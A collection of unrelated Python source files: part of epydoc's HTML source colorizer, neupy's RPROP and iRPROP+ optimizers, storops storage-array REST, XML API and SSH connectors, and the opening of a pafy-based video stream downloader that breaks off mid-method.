#: should be used to colorize a given token. The following keys
#: may be used:
#: - Any token name (e.g., C{'STRING'})
#: - Any operator token (e.g., C{'='} or C{'@'}).
#: - C{'KEYWORD'} -- Python keywords such as C{'for'} and C{'if'}
#: - C{'DEFNAME'} -- the name of a class or function at the top
#: of its definition statement.
#: - C{'BASECLASS'} -- names of base classes at the top of a class
#: definition statement.
#: - C{'PARAM'} -- function parameters
#: - C{'DOCSTRING'} -- docstrings
#: - C{'DECORATOR'} -- decorator names
#: If no CSS class can be found for a given token, then it won't
#: be marked with any CSS class.
CSS_CLASSES = {
'NUMBER': 'py-number',
'STRING': 'py-string',
'COMMENT': 'py-comment',
'NAME': 'py-name',
'KEYWORD': 'py-keyword',
'DEFNAME': 'py-def-name',
'BASECLASS': 'py-base-class',
'PARAM': 'py-param',
'DOCSTRING': 'py-docstring',
'DECORATOR': 'py-decorator',
'OP': 'py-op',
'@': 'py-decorator',
}
#: HTML code for the beginning of a collapsable function or class
#: definition block. The block contains two <div>...</div>
#: elements -- a collapsed version and an expanded version -- and
#: only one of these elements is visible at any given time. By
#: default, all definition blocks are expanded.
#:
#: This string should be interpolated with the following values::
#: (name, indentation, name)
#: Where C{name} is the anchor name for the function or class; and
#: indentation is a string of whitespace used to indent the
#: ellipsis marker in the collapsed version.
START_DEF_BLOCK = (
'<div id="%s-collapsed" style="display:none;" '
'pad="%s" indent="%s"></div>'
'<div id="%s-expanded">')
#: HTML code for the end of a collapsable function or class
#: definition block.
END_DEF_BLOCK = '</div>'
#: A regular expression used to pick out the unicode encoding for
#: the source file.
UNICODE_CODING_RE = re.compile(r'.*?\n?.*?coding[:=]\s*([-\w.]+)')
#: A configuration constant, used to determine whether or not to add
#: collapsable <div> elements for definition blocks.
ADD_DEF_BLOCKS = True
#: A configuration constant, used to determine whether or not to
#: add line numbers.
ADD_LINE_NUMBERS = True
#: A configuration constant, used to determine whether or not to
#: add tooltips for linked names.
ADD_TOOLTIPS = True
#: If true, then try to guess which target is appropriate for
#: linked names; if false, then always open a div asking the
#: user which one they want.
GUESS_LINK_TARGETS = False
def __init__(self, module_filename, module_name,
docindex=None, url_func=None, name_to_docs=None):
"""
Create a new HTML colorizer for the specified module.
@param module_filename: The name of the file containing the
module; its text will be loaded from this file.
@param module_name: The dotted name of the module; this will
be used to create links back into the API source
documentation.
"""
# Get the source version, if possible.
try: module_filename = py_src_filename(module_filename)
except: pass
#: The filename of the module we're colorizing.
self.module_filename = module_filename
#: The dotted name of the module we're colorizing.
self.module_name = module_name
#: A docindex, used to create href links from identifiers to
#: the API documentation for their values.
self.docindex = docindex
#: A mapping from short names to lists of ValueDoc, used to
#: decide which values an identifier might map to when creating
#: href links from identifiers to the API docs for their values.
self.name_to_docs = name_to_docs
#: A function that maps APIDoc -> URL, used to create href
#: links from identifiers to the API documentation for their
#: values.
self.url_func = url_func
#: The index in C{text} of the last character of the last
#: token we've processed.
self.pos = 0
#: A list that maps line numbers to character offsets in
#: C{text}. In particular, line C{M{i}} begins at character
#: C{line_offset[i]} in C{text}. Since line numbers begin at
#: 1, the first element of C{line_offsets} is C{None}.
self.line_offsets = []
#: A list of C{(toktype, toktext)} for all tokens on the
#: logical line that we are currently processing. Once a
#: complete line of tokens has been collected in C{cur_line},
#: it is sent to L{handle_line} for processing.
self.cur_line = []
#: A list of the names of the class or functions that include
#: the current block. C{context} has one element for each
#: level of indentation; C{context[i]} is the name of the class
#: or function defined by the C{i}th level of indentation, or
#: C{None} if that level of indentation doesn't correspond to a
#: class or function definition.
self.context = []
#: A list, corresponding one-to-one with L{self.context},
#: indicating the type of each entry. Each element of
#: C{context_types} is one of: C{'func'}, C{'class'}, C{None}.
self.context_types = []
#: A list of indentation strings for each of the current
#: block's indents. I.e., the current total indentation can
#: be found by taking C{''.join(self.indents)}.
self.indents = []
#: The line number of the line we're currently processing.
self.lineno = 0
#: The name of the class or function whose definition started
#: on the previous logical line, or C{None} if the previous
#: logical line was not a class or function definition.
self.def_name = None
#: The type of the class or function whose definition started
#: on the previous logical line, or C{None} if the previous
#: logical line was not a class or function definition.
#: Can be C{'func'}, C{'class'}, C{None}.
self.def_type = None
def find_line_offsets(self):
"""
Construct the L{line_offsets} table from C{self.text}.
"""
# line 0 doesn't exist; line 1 starts at char offset 0.
self.line_offsets = [None, 0]
# Find all newlines in `text`, and add an entry to
# line_offsets for each one.
pos = self.text.find('\n')
while pos != -1:
self.line_offsets.append(pos+1)
pos = self.text.find('\n', pos+1)
# Add a final entry, marking the end of the string.
self.line_offsets.append(len(self.text))
def lineno_to_html(self):
template = '%%%ds' % self.linenum_size
n = template % self.lineno
return '<a name="L%s"></a><tt class="py-lineno">%s</tt>' \
% (self.lineno, n)
def colorize(self):
"""
Return an HTML string that renders the source code for the
module that was specified in the constructor.
"""
# Initialize all our state variables
self.pos = 0
self.cur_line = []
self.context = []
self.context_types = []
self.indents = []
self.lineno = 1
self.def_name = None
self.def_type = None
# Cache, used so we only need to list the target elements once
# for each variable.
self.doclink_targets_cache = {}
# Load the module's text.
self.text = open(self.module_filename).read()
self.text = self.text.expandtabs().rstrip()+'\n'
# Construct the line_offsets table.
self.find_line_offsets()
num_lines = self.text.count('\n')+1
self.linenum_size = len(`num_lines+1`)
# Call the tokenizer, and send tokens to our `tokeneater()`
# method. If anything goes wrong, then fall-back to using
# the input text as-is (with no colorization).
try:
output = StringIO()
self.out = output.write
tokenize.tokenize(StringIO(self.text).readline, self.tokeneater)
html = output.getvalue()
except tokenize.TokenError, ex:
html = self.text
# Check for a unicode encoding declaration.
m = self.UNICODE_CODING_RE.match(self.text)
if m: coding = m.group(1)
else: coding = 'iso-8859-1'
# Decode the html string into unicode, and then encode it back
# into ascii, replacing any non-ascii characters with xml
# character references.
try:
html = html.decode(coding).encode('ascii', 'xmlcharrefreplace')
except LookupError:
coding = 'iso-8859-1'
html = html.decode(coding).encode('ascii', 'xmlcharrefreplace')
# Call expandto.
html += PYSRC_EXPANDTO_JAVASCRIPT
return html
def tokeneater(self, toktype, toktext, (srow,scol), (erow,ecol), line):
"""
A callback function used by C{tokenize.tokenize} to handle
each token in the module. C{tokeneater} collects tokens into
the C{self.cur_line} list until a complete logical line has
been formed; and then calls L{handle_line} to process that line.
"""
# If we encounter any errors, then just give up.
if toktype == token.ERRORTOKEN:
raise tokenize.TokenError, toktype
# Did we skip anything whitespace? If so, add a pseudotoken
# for it, with toktype=None. (Note -- this skipped string
# might also contain continuation slashes; but I won't bother
# to colorize them.)
startpos = self.line_offsets[srow] + scol
if startpos > self.pos:
skipped = self.text[self.pos:startpos]
self.cur_line.append( (None, skipped) )
# Update our position.
self.pos = startpos + len(toktext)
# Update our current line.
self.cur_line.append( (toktype, toktext) )
# When we reach the end of a line, process it.
if toktype == token.NEWLINE or toktype == token.ENDMARKER:
self.handle_line(self.cur_line)
self.cur_line = []
_next_uid = 0
# [xx] note -- this works with byte strings, not unicode strings!
# I may change it to use unicode eventually, but when I do it
# needs to be changed all at once.
def handle_line(self, line):
"""
Render a single logical line from the module, and write the
generated HTML to C{self.out}.
@param line: A single logical line, encoded as a list of
C{(toktype,tokttext)} pairs corresponding to the tokens in
the line.
"""
# def_name is the name of the function or class defined by
# this line; or None if no funciton or class is defined.
def_name = None
# def_type is the type of the function or class defined by
# this line; or None if no funciton or class is defined.
def_type = None
# does this line start a class/func def?
starting_def_block = False
in_base_list = False
in_param_list = False
in_param_default = 0
at_module_top = (self.lineno == 1)
ended_def_blocks = 0
# The html output.
if self.ADD_LINE_NUMBERS:
s = self.lineno_to_html()
self.lineno += 1
else:
s = ''
s += ' <tt class="py-line">'
# Loop through each token, and colorize it appropriately.
for i, (toktype, toktext) in enumerate(line):
if type(s) is not str:
if type(s) is unicode:
log.error('While colorizing %s -- got unexpected '
'unicode string' % self.module_name)
s = s.encode('ascii', 'xmlcharrefreplace')
else:
raise ValueError('Unexpected value for s -- %s' %
type(s).__name__)
# For each token, determine its css class and whether it
# should link to a url.
css_class = None
url = None
tooltip = None
onclick = uid = targets = None # these 3 are used together.
# Is this token the class name in a class definition? If
# so, then make it a link back into the API docs.
if i>=2 and line[i-2][1] == 'class':
in_base_list = True
css_class = self.CSS_CLASSES['DEFNAME']
def_name = toktext
def_type = 'class'
if 'func' not in self.context_types:
cls_name = self.context_name(def_name)
url = self.name2url(cls_name)
s = self.mark_def(s, cls_name)
starting_def_block = True
# Is this token the function name in a function def? If
# so, then make it a link back into the API docs.
elif i>=2 and line[i-2][1] == 'def':
in_param_list = True
css_class = self.CSS_CLASSES['DEFNAME']
def_name = toktext
def_type = 'func'
if 'func' not in self.context_types:
cls_name = self.context_name()
func_name = self.context_name(def_name)
url = self.name2url(cls_name, def_name)
s = self.mark_def(s, func_name)
starting_def_block = True
# For each indent, update the indents list (which we use
# to keep track of indentation strings) and the context
# list. If this indent is the start of a class or
# function def block, then self.def_name will be its name;
# otherwise, it will be None.
elif toktype == token.INDENT:
self.indents.append(toktext)
self.context.append(self.def_name)
self.context_types.append(self.def_type)
# When we dedent, pop the last elements off the indents
# list and the context list. If the last context element
# is a name, then we're ending a class or function def
# block; so write an end-div tag.
elif toktype == token.DEDENT:
self.indents.pop()
self.context_types.pop()
if self.context.pop():
ended_def_blocks += 1
# If this token contains whitespace, then don't bother to
# give it a css tag.
elif toktype in (None, tokenize.NL, token.NEWLINE,
token.ENDMARKER):
css_class = None
# Check if the token is a keyword.
elif toktype == token.NAME and keyword.iskeyword(toktext):
css_class = self.CSS_CLASSES['KEYWORD']
elif in_base_list and toktype == token.NAME:
css_class = self.CSS_CLASSES['BASECLASS']
elif (in_param_list and toktype == token.NAME and
not in_param_default):
css_class = self.CSS_CLASSES['PARAM']
# Class/function docstring.
elif (self.def_name and line[i-1][0] == token.INDENT and
self.is_docstring(line, i)):
css_class = self.CSS_CLASSES['DOCSTRING']
# Module docstring.
elif at_module_top and self.is_docstring(line, i):
css_class = self.CSS_CLASSES['DOCSTRING']
# check for decorators??
elif (toktype == token.NAME and
((i>0 and line[i-1][1]=='@') or
(i>1 and line[i-1][0]==None and line[i-2][1] == '@'))):
css_class = self.CSS_CLASSES['DECORATOR']
# If it's a name, try to link it.
elif toktype == token.NAME:
css_class = self.CSS_CLASSES['NAME']
# If we have a variable named `toktext` in the current
# context, then link to that. Note that if we're inside
# a function, then that function is our context, not
# the namespace that contains it. [xx] this isn't always
# the right thing to do.
if (self.GUESS_LINK_TARGETS and self.docindex is not None
and self.url_func is not None):
context = [n for n in self.context if n is not None]
container = self.docindex.get_vardoc(
DottedName(self.module_name, *context))
if isinstance(container, NamespaceDoc):
doc = container.variables.get(toktext)
if doc is not None:
url = self.url_func(doc)
tooltip = str(doc.canonical_name)
# Otherwise, check the name_to_docs index to see what
# else this name might refer to.
if (url is None and self.name_to_docs is not None
and self.url_func is not None):
docs = self.name_to_docs.get(toktext)
if docs:
tooltip='\n'.join([str(d.canonical_name)
for d in docs])
if len(docs) == 1 and self.GUESS_LINK_TARGETS:
url = self.url_func(docs[0])
else:
uid, onclick, targets = self.doclink(toktext, docs)
# For all other tokens, look up the CSS class to use
# based on the token's type.
else:
if toktype == token.OP and toktext in self.CSS_CLASSES:
css_class = self.CSS_CLASSES[toktext]
elif token.tok_name[toktype] in self.CSS_CLASSES:
css_class = self.CSS_CLASSES[token.tok_name[toktype]]
else:
css_class = None
# update our status..
if toktext == ':':
in_base_list = False
in_param_list = False
if toktext == '=' and in_param_list:
in_param_default = True
if in_param_default:
if toktext in ('(','[','{'): in_param_default += 1
if toktext in (')',']','}'): in_param_default -= 1
if toktext == ',' and in_param_default == 1:
in_param_default = 0
# Write this token, with appropriate colorization.
if tooltip and self.ADD_TOOLTIPS:
tooltip_html = ' title="%s"' % tooltip
else: tooltip_html = ''
if css_class: css_class_html = ' class="%s"' % css_class
else: css_class_html = ''
if onclick:
if targets: targets_html = ' targets="%s"' % targets
else: targets_html = ''
s += ('<tt id="%s"%s%s><a%s%s href="#" onclick="%s">' %
(uid, css_class_html, targets_html, tooltip_html,
css_class_html, onclick))
elif url:
if isinstance(url, unicode):
url = url.encode('ascii', 'xmlcharrefreplace')
s += ('<a%s%s href="%s">' %
(tooltip_html, css_class_html, url))
elif css_class_html or tooltip_html:
s += '<tt%s%s>' % (tooltip_html, css_class_html)
if i == len(line)-1:
s += ' </tt>' # Closes <tt class="py-line">
s += cgi.escape(toktext)
else:
try:
s += self.add_line_numbers(cgi.escape(toktext), css_class)
except Exception, e:
print (toktext, css_class, toktext.encode('ascii'))
raise
if onclick: s += "</a></tt>"
elif url: s += '</a>'
elif css_class_html or tooltip_html: s += '</tt>'
if self.ADD_DEF_BLOCKS:
for i in range(ended_def_blocks):
self.out(self.END_DEF_BLOCK)
# Strip any empty <tt>s.
s = re.sub(r'<tt class="[\w+]"></tt>', '', s)
# Write the line.
self.out(s)
if def_name and starting_def_block:
self.out('</div>')
# Add div's if we're starting a def block.
if (self.ADD_DEF_BLOCKS and def_name and starting_def_block and
(line[-2][1] == ':')):
indentation = (''.join(self.indents)+' ').replace(' ', '+')
linenum_padding = '+'*self.linenum_size
name=self.context_name(def_name)
self.out(self.START_DEF_BLOCK % (name, linenum_padding,
indentation, name))
self.def_name = def_name
self.def_type = def_type
def context_name(self, extra=None):
pieces = [n for n in self.context if n is not None]
if extra is not None: pieces.append(extra)
return '.'.join(pieces)
def doclink(self, name, docs):
uid = 'link-%s' % self._next_uid
self._next_uid += 1
context = [n for n in self.context if n is not None]
container = DottedName(self.module_name, *context)
#else:
# container = None
targets = ','.join(['%s=%s' % (str(self.doc_descr(d,container)),
str(self.url_func(d)))
for d in docs])
if targets in self.doclink_targets_cache:
onclick = ("return doclink('%s', '%s', '%s');" %
(uid, name, self.doclink_targets_cache[targets]))
return uid, onclick, None
else:
self.doclink_targets_cache[targets] = uid
onclick = ("return doclink('%s', '%s', '%s');" %
(uid, name, uid))
return uid, onclick, targets
def doc_descr(self, doc, context):
name = str(doc.canonical_name)
descr = '%s %s' % (self.doc_kind(doc), name)
if isinstance(doc, RoutineDoc):
descr += '()'
return descr
# [XX] copied streight from html.py; this should be consolidated,
# probably into apidoc.
def doc_kind(self, doc):
if isinstance(doc, ModuleDoc) and doc.is_package == True:
return 'Package'
elif (isinstance(doc, ModuleDoc) and
doc.canonical_name[0].startswith('script')):
return 'Script'
elif isinstance(doc, ModuleDoc):
return 'Module'
elif isinstance(doc, ClassDoc):
return 'Class'
elif isinstance(doc, ClassMethodDoc):
return 'Class Method'
elif isinstance(doc, StaticMethodDoc):
return 'Static Method'
elif isinstance(doc, RoutineDoc):
if (self.docindex is not None and
isinstance(self.docindex.container(doc), ClassDoc)):
return 'Method'
else:
return 'Function'
else:
return 'Variable'
def mark_def(self, s, name):
replacement = ('<a name="%s"></a><div id="%s-def">\\1'
'<a class="py-toggle" href="#" id="%s-toggle" '
'onclick="return toggle(\'%s\');">-</a>\\2' %
(name, name, name, name))
return re.sub('(.*) (<tt class="py-line">.*)\Z', replacement, s)
def is_docstring(self, line, i):
if line[i][0] != token.STRING: return False
for toktype, toktext in line[i:]:
if toktype not in (token.NEWLINE, tokenize.COMMENT,
tokenize.NL, token.STRING, None):
return False
return True
def add_line_numbers(self, s, css_class):
result = ''
start = 0
end = s.find('\n')+1
while end:
result += s[start:end-1]
if css_class: result += '</tt>'
result += ' </tt>' # py-line
result += '\n'
if self.ADD_LINE_NUMBERS:
result += self.lineno_to_html()
result += ' <tt class="py-line">'
if css_class: result += '<tt class="%s">' % css_class
start = end
end = s.find('\n', end)+1
self.lineno += 1
result += s[start:]
return result
def name2url(self, class_name, func_name=None):
if class_name:
class_name = '%s.%s' % (self.module_name, class_name)
if func_name:
return '%s-class.html#%s' % (class_name, func_name)
else:
return '%s-class.html' % class_name
else:
return '%s-module.html#%s' % (self.module_name, func_name)
_HDR = '''\
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>$title$</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
'''
_FOOT = '</body></html>'
if __name__=='__main__':
#s = PythonSourceColorizer('../apidoc.py', 'epydoc.apidoc').colorize()
s = PythonSourceColorizer('/tmp/fo.py', 'epydoc.apidoc').colorize()
#print s
import codecs
f = codecs.open('/home/edloper/public_html/color3.html', 'w', 'ascii', 'xmlcharrefreplace')
f.write(_HDR+'<pre id="py-src-top" class="py-src">'+s+'</pre>'+_FOOT)
f.close()
|
|
import tensorflow as tf
import numpy as np
from neupy.utils import tensorflow_session
from neupy.core.properties import BoundedProperty, ProperFractionProperty
from .base import BaseOptimizer
__all__ = ('RPROP', 'IRPROPPlus')
class RPROP(BaseOptimizer):
"""
Resilient backpropagation (RPROP) is an optimization
algorithm for supervised learning.
RPROP algorithm takes into account only direction of the gradient
and completely ignores its magnitude. Every weight values has a unique
step size associated with it (by default all of the are equal to ``step``).
The rule is following, when gradient direction changes (sign of the
gradient) we decrease step size for specific weight multiplying it by
``decrease_factor`` and if sign stays the same than we increase step
size for this specific weight multiplying it by ``increase_factor``.
The step size is always bounded by ``minstep`` and ``maxstep``.
Notes
-----
Algorithm doesn't work with mini-batches.
Parameters
----------
minstep : float
Minimum possible value for step. Defaults to ``0.001``.
maxstep : float
Maximum possible value for step. Defaults to ``10``.
increase_factor : float
Increase factor for step in case when gradient doesn't change
sign compare to previous epoch.
decrease_factor : float
Decrease factor for step in case when gradient changes sign
compare to previous epoch.
{BaseOptimizer.Parameters}
Attributes
----------
{BaseOptimizer.Attributes}
Methods
-------
{BaseOptimizer.Methods}
Examples
--------
>>> import numpy as np
>>> from neupy import algorithms
>>> from neupy.layers import *
>>>
>>> x_train = np.array([[1, 2], [3, 4]])
>>> y_train = np.array([[1], [0]])
>>>
>>> network = Input(2) >> Sigmoid(3) >> Sigmoid(1)
>>> optimizer = algorithms.RPROP(network)
>>> optimizer.train(x_train, y_train)
See Also
--------
:network:`IRPROPPlus` : iRPROP+ algorithm.
:network:`GradientDescent` : GradientDescent algorithm.
"""
# This properties correct upper and lower bounds for steps.
minstep = BoundedProperty(default=0.001, minval=0)
maxstep = BoundedProperty(default=10, minval=0)
# This properties increase/decrease step by dividing it to
# some coefficient.
increase_factor = BoundedProperty(minval=1, default=1.2)
decrease_factor = ProperFractionProperty(default=0.5)
def update_prev_delta(self, prev_delta):
return prev_delta
def init_train_updates(self):
updates = []
variables = []
for (_, _), variable in self.network.variables.items():
if variable.trainable:
variables.append(variable)
gradients = tf.gradients(self.variables.loss, variables)
for parameter, gradient in zip(variables, gradients):
with tf.variable_scope(parameter.op.name):
steps = tf.Variable(
# Steps will be decreased after the first iteration,
# because all previous gradients are equal to zero.
# In order to make sure that network will use the same
# step per every weight we re-scale step and after the
# first iteration it will be multiplied by
# ``decrease_factor`` and scaled back to the default
# step value.
tf.ones_like(parameter) * self.step,
name="steps",
dtype=tf.float32,
)
prev_delta = tf.Variable(
tf.zeros(parameter.shape),
name="prev-delta",
dtype=tf.float32,
)
# We collect only signs since it ensures numerical stability
# after multiplication when we deal with small numbers.
prev_gradient_sign = tf.Variable(
tf.zeros(parameter.shape),
name="prev-grad-sign",
dtype=tf.float32,
)
updated_prev_delta = self.update_prev_delta(prev_delta)
gradient_sign = tf.sign(gradient)
grad_sign_product = gradient_sign * prev_gradient_sign
gradient_changed_sign = tf.equal(grad_sign_product, -1)
updated_steps = tf.clip_by_value(
tf.where(
tf.equal(grad_sign_product, 1),
steps * self.increase_factor,
tf.where(
gradient_changed_sign,
steps * self.decrease_factor,
steps,
)
),
self.minstep,
self.maxstep,
)
parameter_delta = tf.where(
gradient_changed_sign,
# If we subtract previous negative weight update it means
# that we will revert weight update that has been applied
# in the previous iteration.
-updated_prev_delta,
updated_steps * gradient_sign,
)
# Making sure that during the next iteration sign, after
# we multiplied by the new gradient, won't be negative.
# Otherwise, the same roll back using previous delta
# won't make much sense.
clipped_gradient_sign = tf.where(
gradient_changed_sign,
tf.zeros_like(gradient_sign),
gradient_sign,
)
updates.extend([
(parameter, parameter - parameter_delta),
(steps, updated_steps),
(prev_gradient_sign, clipped_gradient_sign),
(prev_delta, parameter_delta),
])
return updates
class IRPROPPlus(RPROP):
"""
iRPROP+ is an optimization algorithm for supervised learning.
This is a variation of the :network:`RPROP` algorithm.
Parameters
----------
{RPROP.minstep}
{RPROP.maxstep}
{RPROP.increase_factor}
{RPROP.decrease_factor}
{BaseOptimizer.regularizer}
{BaseOptimizer.network}
{BaseOptimizer.loss}
{BaseNetwork.show_epoch}
{BaseNetwork.shuffle_data}
{BaseNetwork.signals}
{Verbose.verbose}
Methods
-------
{BaseSkeleton.predict}
{BaseOptimizer.train}
{BaseSkeleton.fit}
Notes
-----
{RPROP.Notes}
Examples
--------
>>> import numpy as np
>>> from neupy import algorithms
>>> from neupy.layers import *
>>>
>>> x_train = np.array([[1, 2], [3, 4]])
>>> y_train = np.array([[1], [0]])
>>>
>>> network = Input(2) >> Sigmoid(3) >> Sigmoid(1)
>>> optimizer = algorithms.IRPROPPlus(network)
>>> optimizer.train(x_train, y_train)
References
----------
[1] Christian Igel, Michael Huesken (2000)
Improving the Rprop Learning Algorithm
See Also
--------
:network:`RPROP` : RPROP algorithm.
:network:`GradientDescent` : GradientDescent algorithm.
"""
def init_functions(self):
self.variables.update(
last_error=tf.Variable(np.nan, name='irprop-plus/last-error'),
previous_error=tf.Variable(
np.nan, name='irprop-plus/previous-error'),
)
super(IRPROPPlus, self).init_functions()
def one_training_update(self, X_train, y_train):
if len(self.errors.train) >= 2:
previous_error, last_error = self.errors.train[-2:]
session = tensorflow_session()
self.variables.last_error.load(last_error, session)
self.variables.previous_error.load(previous_error, session)
return super(IRPROPPlus, self).one_training_update(X_train, y_train)
def update_prev_delta(self, prev_delta):
last_error = self.variables.last_error
prev_error = self.variables.previous_error
return tf.where(
# We revert weight when gradient changed the sign only in
# cases when error increased. Otherwise we don't apply any
# update for this weight.
last_error > prev_error,
prev_delta,
tf.zeros_like(prev_delta),
)
|
|
# coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import functools
import logging
import pipes
import six
from retryz import retry
from storops.connection import client
from storops.connection.exceptions import SFtpExecutionError, \
SSHExecutionError, HTTPClientError
from storops.lib import common
paramiko = common.try_import('paramiko')
LOG = logging.getLogger(__name__)
def require_csrf_token(func):
@functools.wraps(func)
def decorator(self, url, **kwargs):
wrapped = retry(on_error=self._http_authentication_error,
on_retry=self._update_csrf_token)(func)
return wrapped(self, url, **kwargs)
return decorator
class UnityRESTConnector(object):
HEADERS = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Accept_Language': 'en_US',
'Visibility': 'Engineering',
'X-EMC-REST-CLIENT': 'true',
'User-agent': 'EMC-OpenStack',
}
def __init__(self, host, port=443, user='admin', password='',
verify=False, retries=None, cache_interval=0,
connect_timeout=30, application_type=None):
base_url = 'https://{host}:{port}'.format(host=host, port=port)
insecure = False
ca_cert_path = None
if isinstance(verify, bool):
insecure = not verify
else:
ca_cert_path = verify
if application_type:
self.HEADERS['Application-Type'] = application_type
self.http_client = client.HTTPClient(base_url=base_url,
headers=self.HEADERS,
auth=(user, password),
insecure=insecure,
retries=retries,
ca_cert_path=ca_cert_path,
cache_interval=cache_interval,
timeout=(connect_timeout, None))
def get(self, url, **kwargs):
return self.http_client.get(url, **kwargs)
@staticmethod
def _http_authentication_error(err):
return isinstance(err, HTTPClientError) and err.http_status == 401
@require_csrf_token
def post(self, url, **kwargs):
return self.http_client.post(url, **kwargs)
@require_csrf_token
def delete(self, url, **kwargs):
return self.http_client.delete(url, **kwargs)
def _update_csrf_token(self):
path_user = '/api/types/user/instances'
resp, body = self.get(path_user)
headers = {'emc-csrf-token': resp.headers['emc-csrf-token']}
self.http_client.update_headers(headers)
class XMLAPIConnector(object):
HEADERS = {
'Content-Type': 'application/x-www-form-urlencoded',
}
def __init__(self, host, user='nasadim', password=''):
base_url = 'https://{}'.format(host)
self.http_client = client.HTTPClient(base_url=base_url,
headers=self.HEADERS,
auth=(user, password),
insecure=True)
self.host = host
self.user = user
self.password = password
self._login(host, user, password)
def _login(self, host, user, password):
url = 'https://{}/Login/?user={}&password={}&Login=Login'.format(
host, user, password)
self.http_client.request(url, 'GET')
def post(self, body):
url = '/servlets/CelerraManagementServices'
try:
return self.http_client.post(url, body=body)
except HTTPClientError as ex:
if ex.http_status == 403:
self._login(self.host, self.user, self.password)
self.http_client.post(url, body=body)
else:
raise
class SSHConnector(object):
"""SSH Connection to the specified host."""
def __init__(self, host, username, password, port=22):
self.transport = None
self.init_connection(host, password, port, username)
self.isLive = True
def init_connection(self, host, password, port, username):
self.transport = paramiko.Transport((host, port))
# Currently we only support to use the password to ssh.
if password:
try:
self.transport.connect(username=username, password=password)
except paramiko.ssh_exception.SSHException as ex:
error_msg = ('Failed to setup SSH connection. '
'Reason:%s.' % six.text_type(ex))
LOG.error(error_msg)
raise ex
def execute(self, command, timeout=None, check_exit_code=True):
cmd = ' '.join(pipes.quote(cmd_arg) for cmd_arg in command)
channel = self.transport.open_session()
channel.exec_command(cmd)
channel.settimeout(timeout)
exit_status = channel.recv_exit_status()
stdout = channel.makefile('r').read()
stderr = channel.makefile_stderr('r').read()
channel.makefile('wb').close()
self._ssh_command_log(cmd, stdout, stderr)
# exit_status == -1 if no exit code was returned
if exit_status != -1:
LOG.debug('Result was %s' % exit_status)
if check_exit_code and exit_status != 0:
raise SSHExecutionError(exit_code=exit_status,
stdout=stdout,
stderr=stderr,
cmd=cmd)
return stdout, stderr
def copy_file_to_remote(self, local_path, remote_path):
"""scp the local file to remote folder.
:param local_path: local path
:param remote_path: remote path
"""
sftp_client = self.transport.open_sftp_client()
LOG.debug('Copy the local file to remote. '
'Source=%(src)s. Target=%(target)s.' %
{'src': local_path, 'target': remote_path})
try:
sftp_client.put(local_path, remote_path)
except Exception as ex:
LOG.error('Failed to copy the local file to remote. '
'Reason: %s.' % six.text_type(ex))
raise SFtpExecutionError(err=ex)
def get_remote_file(self, remote_path, local_path):
"""Fetch remote File.
:param remote_path: remote path
:param local_path: local path
"""
sftp_client = self.transport.open_sftp_client()
LOG.debug('Get the remote file. '
'Source=%(src)s. Target=%(target)s.' %
{'src': remote_path, 'target': local_path})
try:
sftp_client.get(remote_path, local_path)
except Exception as ex:
LOG.error('Failed to secure copy. Reason: %s.' %
six.text_type(ex))
raise SFtpExecutionError(err=ex)
def close(self):
"""Closes the ssh connection."""
if 'isLive' in self.__dict__ and self.isLive:
self.transport.close()
self.isLive = False
def __del__(self):
"""Try to close the ssh connection if not explicitly closed."""
self.close()
@staticmethod
def _ssh_command_log(command, stdout, stderr):
LOG.debug('[SSH Command] {}\n'
'[stdout] {}\n'
'[stderr] {}\n'
.format(command, stdout, stderr))
|
|
import pafy
import datetime
import os
class Stream_Generator():
def __init__(self, url, start_time, end_time, format_type,
chosen_format, top_dir):
self.url = url
self.start_time = start_time
self.end_time = end_time
self.start_time_set = False
self.end_time_set = False
self.title = None
self.duration = None
self.stream = None
self.vid = None
self.chosen_format = chosen_format
self.sub_format = None
self.format_type = format_type
self.file_path = None # final path to download stream to
self.temp_file_path = None # temporary file path for convertion/trimming
self.top_dir = top_dir
self.error_messages = None
self.disallowed_characters = ['~', '#', '%', '*', '{', '}', '\\',
':', '<', '>', '?', '/', '+', '|', '"']
def generate(self):
# build stream and set user configuration while handling errors
self.set_url()
if self.get_errors():
return
self.set_time()
if self.get_errors():
return
self.set_media_format()
if self.get_errors():
return
self.set_title()
self.set_file_path()
def set_url(self):
# create a new pafy object from url
try:
#logger.log_debug('Checking if URL exists \'%s\'' % url)
self.vid = pafy.new(self.url)
#logger.log_debug('URL found.')
except (IOError, ValueError): # Catches the exception if the URL wasn't found
self.error_messages = ('URL not found: %s' %self.url)
# handle any unexpected pafy exceptions
except Exception as e:
self.error_messages = ('An unexpected error occurred when searching for '
'URL \'%s\', please try again.' %self.url)
print(e)
#logger.log_debug('URL not found. Exception: %s' % e)
def set_title(self):
# parse the title of the stream so that it is allowed to be used as a filename
title = self.stream.title
title = title.replace('"', '\'')
title = title.replace('&', 'and')
for character in self.disallowed_characters:
title = title.replace(character, '')
self.title = title
def set_file_path(self):
# builds a file path for the stream to be downloaded to and builds a temporary
# path if a conversion is required or the stream needs to be trimmed. duplicate
# filenames are checked and handled here.
file_path = os.path.join(self.top_dir, self.title)
# add ' - Copy' to the filename until its unique
while os.path.isfile(file_path + "." + self.chosen_format):
file_path += " - Copy"
if self.is_convert_required():
temp_file_path = file_path + '_TEMP'
# add '_TEMP' to the temporary file filename until its unique
while os.path.isfile(temp_file_path + '.' + self.sub_format):
temp_file_path += '_TEMP'
self.temp_file_path = temp_file_path + '.' + self.sub_format
elif self.is_trimmed():
temp_file_path = file_path + '_TEMP'
# add '_TEMP' to the temporary file filename until its unique
while os.path.isfile(temp_file_path + '.' + self.chosen_format):
temp_file_path += '_TEMP'
self.temp_file_path = temp_file_path + '.' + self.chosen_format
self.file_path = file_path + '.' + self.chosen_format
def set_time(self):
# carry's out various checks and sets the start and end time
